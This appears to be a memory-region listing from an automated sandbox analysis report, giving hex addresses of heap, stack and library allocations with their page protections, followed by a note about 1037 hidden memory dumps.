7FFD9A5AF000
|
trusted library allocation
|
page read and write
|
||
7FFD9A2B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A6B0000
|
trusted library allocation
|
page read and write
|
||
CF0000
|
trusted library allocation
|
page read and write
|
||
21FF1633000
|
heap
|
page read and write
|
||
21FEF3DF000
|
heap
|
page read and write
|
||
5DBBE8C000
|
stack
|
page read and write
|
||
63C000
|
heap
|
page read and write
|
||
7FFD9A2B2000
|
trusted library allocation
|
page read and write
|
||
21F80F76000
|
trusted library allocation
|
page read and write
|
||
1B6D71F3000
|
heap
|
page read and write
|
||
7FFD9A560000
|
trusted library allocation
|
page read and write
|
||
2271D955000
|
trusted library allocation
|
page read and write
|
||
7FFD9A460000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A610000
|
trusted library allocation
|
page read and write
|
||
2271DB03000
|
trusted library allocation
|
page read and write
|
||
2271D8F1000
|
trusted library allocation
|
page read and write
|
||
7FFD9A346000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5A0000
|
trusted library allocation
|
page read and write
|
||
A03A8F7000
|
stack
|
page read and write
|
||
2271AF89000
|
heap
|
page read and write
|
||
1D6C72C9000
|
heap
|
page read and write
|
||
7FFD9A720000
|
trusted library allocation
|
page read and write
|
||
BF08479000
|
stack
|
page read and write
|
||
22735238000
|
heap
|
page read and write
|
||
1D6C8CF0000
|
trusted library allocation
|
page read and write
|
||
2AC4000
|
trusted library allocation
|
page read and write
|
||
2273499B000
|
heap
|
page read and write
|
||
7FFD9A376000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A4D0000
|
trusted library allocation
|
page read and write
|
||
1D6C8D70000
|
heap
|
page execute and read and write
|
||
7FFD9A640000
|
trusted library allocation
|
page read and write
|
||
A03AA3E000
|
stack
|
page read and write
|
||
2271AF08000
|
heap
|
page read and write
|
||
1B6BF813000
|
trusted library allocation
|
page read and write
|
||
1D080000
|
trusted library allocation
|
page read and write
|
||
21FF1415000
|
heap
|
page read and write
|
||
241C000
|
trusted library allocation
|
page read and write
|
||
21F80F7A000
|
trusted library allocation
|
page read and write
|
||
2271E0A7000
|
trusted library allocation
|
page read and write
|
||
2AF4000
|
trusted library allocation
|
page read and write
|
||
1C1000
|
stack
|
page read and write
|
||
249E000
|
stack
|
page read and write
|
||
1B6BEC1D000
|
trusted library allocation
|
page read and write
|
||
7FFD9A370000
|
trusted library allocation
|
page read and write
|
||
7FFD9A5F9000
|
trusted library allocation
|
page read and write
|
||
21F902FB000
|
trusted library allocation
|
page read and write
|
||
1C2FF000
|
stack
|
page read and write
|
||
1B6BE740000
|
heap
|
page read and write
|
||
B02000
|
heap
|
page read and write
|
||
1B6BCD23000
|
heap
|
page read and write
|
||
477000
|
heap
|
page read and write
|
||
21FEF765000
|
heap
|
page read and write
|
||
227351D9000
|
heap
|
page read and write
|
||
1C314000
|
heap
|
page read and write
|
||
5DBAD7E000
|
stack
|
page read and write
|
||
1D6E160C000
|
heap
|
page read and write
|
||
1D6C74D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A520000
|
trusted library allocation
|
page read and write
|
||
7FFD9A340000
|
trusted library allocation
|
page read and write
|
||
1D6E1800000
|
heap
|
page read and write
|
||
1B6D721D000
|
heap
|
page read and write
|
||
227351BF000
|
heap
|
page read and write
|
||
1CE4D000
|
stack
|
page read and write
|
||
7FFD9A600000
|
trusted library allocation
|
page read and write
|
||
BF0944C000
|
stack
|
page read and write
|
||
21FEF330000
|
heap
|
page read and write
|
||
BF083FD000
|
stack
|
page read and write
|
||
240E000
|
stack
|
page read and write
|
||
7FFD9A340000
|
trusted library allocation
|
page read and write
|
||
1ABD0000
|
heap
|
page read and write
|
||
22734F60000
|
heap
|
page read and write
|
||
7FFD9A500000
|
trusted library allocation
|
page read and write
|
||
7FFD9A470000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A30C000
|
trusted library allocation
|
page execute and read and write
|
||
5DBBD8E000
|
stack
|
page read and write
|
||
1D6D921A000
|
trusted library allocation
|
page read and write
|
||
1B6D6756000
|
heap
|
page read and write
|
||
7FFD9A590000
|
trusted library allocation
|
page read and write
|
||
1B964000
|
heap
|
page read and write
|
||
21F81786000
|
trusted library allocation
|
page read and write
|
||
1C9CE000
|
stack
|
page read and write
|
||
7FFD9A4B0000
|
trusted library allocation
|
page read and write
|
||
1BCB0000
|
heap
|
page read and write
|
||
6D0000
|
heap
|
page read and write
|
||
A8F000
|
heap
|
page read and write
|
||
24AD000
|
trusted library allocation
|
page read and write
|
||
1D6C9FD1000
|
trusted library allocation
|
page read and write
|
||
7FFD9A602000
|
trusted library allocation
|
page read and write
|
||
7FFD9A70D000
|
trusted library allocation
|
page read and write
|
||
42800FF000
|
stack
|
page read and write
|
||
22734F9D000
|
heap
|
page read and write
|
||
AFF000
|
stack
|
page read and write
|
||
1B6D72B3000
|
heap
|
page read and write
|
||
7DF49F150000
|
trusted library allocation
|
page execute and read and write
|
||
2271D8ED000
|
trusted library allocation
|
page read and write
|
||
2271B1A0000
|
heap
|
page read and write
|
||
2271C840000
|
trusted library allocation
|
page read and write
|
||
6C2000
|
heap
|
page read and write
|
||
1D6C7265000
|
heap
|
page read and write
|
||
BF084F6000
|
stack
|
page read and write
|
||
7FFD9A6E0000
|
trusted library allocation
|
page read and write
|
||
1B6D729B000
|
heap
|
page read and write
|
||
1B6D6D50000
|
heap
|
page execute and read and write
|
||
590000
|
heap
|
page execute and read and write
|
||
21FF166E000
|
heap
|
page read and write
|
||
1B6BCBB0000
|
heap
|
page read and write
|
||
5DBAC7E000
|
stack
|
page read and write
|
||
7FFD9A540000
|
trusted library allocation
|
page read and write
|
||
7FFD9A6F0000
|
trusted library allocation
|
page execute and read and write
|
||
1B6D6C60000
|
heap
|
page read and write
|
||
22734E70000
|
heap
|
page execute and read and write
|
||
7FFD9A4D0000
|
trusted library allocation
|
page read and write
|
||
2271C820000
|
trusted library allocation
|
page read and write
|
||
1D6C72C6000
|
heap
|
page read and write
|
There are 1037 hidden memdumps, click here to show them.